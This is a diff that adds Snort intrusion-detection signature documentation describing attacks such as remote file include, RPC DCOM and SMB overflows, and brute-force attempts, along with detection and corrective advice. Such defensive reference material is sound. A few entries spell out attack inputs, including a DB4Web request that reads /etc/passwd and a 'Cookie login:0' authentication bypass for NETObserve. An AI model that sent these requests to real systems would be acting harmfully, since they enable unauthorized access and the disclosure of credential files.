@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1312
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nude cheerleader".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nude cheerleader".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000723.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000723
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "permissions.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "permissions.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/338.txt
@@ -0,0 +1,60 @@
+SID:
+338
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000639.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000639
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_import.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_import.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/997.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 997
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/684.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid: 
+684
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft SQL Command summary:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_da-di_8nas.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3442.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3442
+
+--
+Summary:
+This event is generated when an attempt is made exploit a known
+vulnerability in Microsoft Windows TCP/IP print services.
+
+--
+Impact:
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Microsoft Windows TCP/IP print services are used to share printers
+attached to Windows based machines with other UNIX based hosts.
+
+Microsoft Windows TCP/IP print services are vulnerable to a DoS when
+processing malformed print requests. Other services may also be affected
+and may need to be restarted to regain functionality should this attack
+be sucessful.
+
+--
+Affected Systems:
+	Microsoft Windows TCP/IP print services for Windows NT
+	Microsoft Windows TCP/IP print services for Windows 2000
+
+--
+Attack Scenarios:
+An attacker can send a malformed print request to port 515 on the server
+hosting the print services and cause the DoS condition.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/702.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+702
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3399.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3399
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2768.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2768
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_grouped_column
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2060.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2060
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in DB4Web.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+DB4Web is an application server used to access various sources of data 
+via a web interface.
+
+DB4Web does not handle the characters ":" and "\" correctly when they 
+are URL encoded. An attacker can use this flaw to gain access to 
+sensitive system information.
+
+Also the application does not correctly handle the use of extra "/" in a
+URI.
+
+It is also possible for the attacker to open arbitrary TCP connections 
+using DB4Web and may be able to use it for portscanning other hosts.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+The attacker merely needs to make a normal HTTP request with the 
+characters ":" or "\" encoded (%3A%5C) followed by the commands the 
+attacker wishes to run.
+
+The attacker can also make a request like 
+http://www.foo.com/cgi-bin/db4web_c/dbdirname//etc/passwd to view the 
+contents of the password file.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable access to DB4Web from external sources.
+
+Apply the appropriate vendor patches.
+
+Run the webserver in a chroot environment to mitigate the risks of 
+disclosure.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+DB4Web
+http://www.db4web.de/DB4Web/home/DB4Web/hotfix_e.html
+
+--
--- /dev/null
+++ b/doc/signatures/3291.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3291
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000162.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000162
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of 401 Unauthorized 
+messages are returned by an SIP-enabled host.
+
+--
+Impact:
+This can be an indication of either a brute force authentication attack or a 
+denial of service in progress.
+
+--
+Detailed Information:
+When a user attempts to send a REGISTER message with invalid credentials, a SIP 
+server returns a 401 Unauthorized message. A high volume of these may indicate 
+that an authentication attack, likely brute-force style, or a denial of service 
+is in progress.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to attempt a brute-force authentication attack 
+or a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is easy to write a script to cycle through all possible 
+authentication values or to simply flood a system with unauthorized data.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/410.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+410
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Fragment Reassembly Time Exceeded message.
+
+--
+
+Impact:
+This could be an indication of an improperly configured routing device or networked host.  
+
+--
+
+Detailed Information:
+ICMP Type 11 Code 1 is the RFC defined messaging type for ICMP Fragment Reassembly Time exceeded datagrams.  If a host fails to reassemble a fragmented datagram before the TTL of the datagram is expires an ICMP Fragment Reassembly Time Exceeded datagram is generated.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Fragment reassembly Time Exceeded messages are normally and indication of improperly configured hosts or routing equipment.  The configurations of the devices causing these ICMP datagrams to be created should be checked for errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2923.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2923
+
+--
+Summary:
+This event is generated when repeated failed attempts are made to access
+an SMB share.
+ 
+--
+Impact:
+Unknown. Possible information disclosure and loss of data.
+
+--
+Detailed Information:
+This event indicates that multiple failed attempts have been made to
+access an SMB network share. This may indicate a determined effort by an
+unauthorized user to access information and data on a network share.
+
+--
+Affected Systems:
+	All systems sharing resources using SMB
+
+--
+Attack Scenarios:
+An attacker can make repeated attempts to access network shares in an
+attempt to gain information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply strict access control to all networked resources.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3112.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3112
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3145.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3145
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/1269.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1269
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rexd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rexd is using.  Attackers can also learn what versions of the rexd protocol are accepted by rexd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rexd run.  The rexd RPC service allows remote program execution.  If weak authentication is used, an attacker user may run arbitrary commands as a user other than root.
+
+--
+Affected Systems:
+AIX 4.0
+Compaq Tru64 UNIX Any version
+HP-UX 10.20
+HP-UX 11
+Red Hat Linux 6.0
+Red Hat Linux 7.x
+Solaris 2.5.1
+Solaris 2.6
+Solaris 7
+Solaris 8
+Unix Any version
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rexd runs.  This may be a precursor to accessing rexd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rexd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rexd, not probes of the rexd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rexd service itself. An attacker may attempt to go directly to the rexd port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/37
+
+CERT
+http://www.cert.org/advisories/CA-1992-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS23
+
+
+--
--- /dev/null
+++ b/doc/signatures/2986.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2986
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/100000179.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+100000179
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server using the TRACE command. In this case, the attack 
+is aimed at the Solaris Management Console Java Web Interface.
+
+--
+Impact:
+Possible disclosure of information.
+
+--
+Detailed Information:
+The TRACE method is used when debugging a webserver to ensure that server 
+returns information to the client correctly. When used with other 
+vulnerabilities it is possible to use the TRACE method to return sensitive 
+information from a webserver such as authentication data and cookies.
+
+This is known as a Cross Site Tracing (XST) attack.
+
+Note: Users who are using sid 2056 with the HTTP_PORTS variable set to 898 do 
+not need to use this rule.
+
+--
+Affected Systems:
+All platforms running a webserver that responds to the TRACE method.
+
+--
+Attack Scenarios:
+The attacker needs to perform a TRACE request to a vulnerable server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The TRACE method is legitimate and may be used to debug a webserver or can be 
+used to debug other networking equipment.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the webserver from responding to TRACE requests.
+
+--
+Contributors:
+Sid 2056 modification suggested by rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc2616.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2441.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2441
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ExploreAnywhere Software's NETObserve.
+
+--
+Impact:
+Execution of commands or control of remote machines being managed by the
+software.
+
+--
+Detailed Information:
+NETObserve is a software solution that can be used to remotely monitor
+and control Windows based machines. It's interface is accessed via HTTP.
+
+By setting a cookie value, used to send login information to NETObserve,
+to 0 an attacker can bypass any checks on login credentials. This can
+present the attacker with administrative privileges to the NETObserve
+application which can be used to manage other remote client machines.
+
+--
+Affected Systems:
+	NETObserve
+
+--
+Attack Scenarios:
+An attacker can set 'Cookie login:0' in a web request to the
+administrative interface and gain administrator access to the
+application.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1594.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1594
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
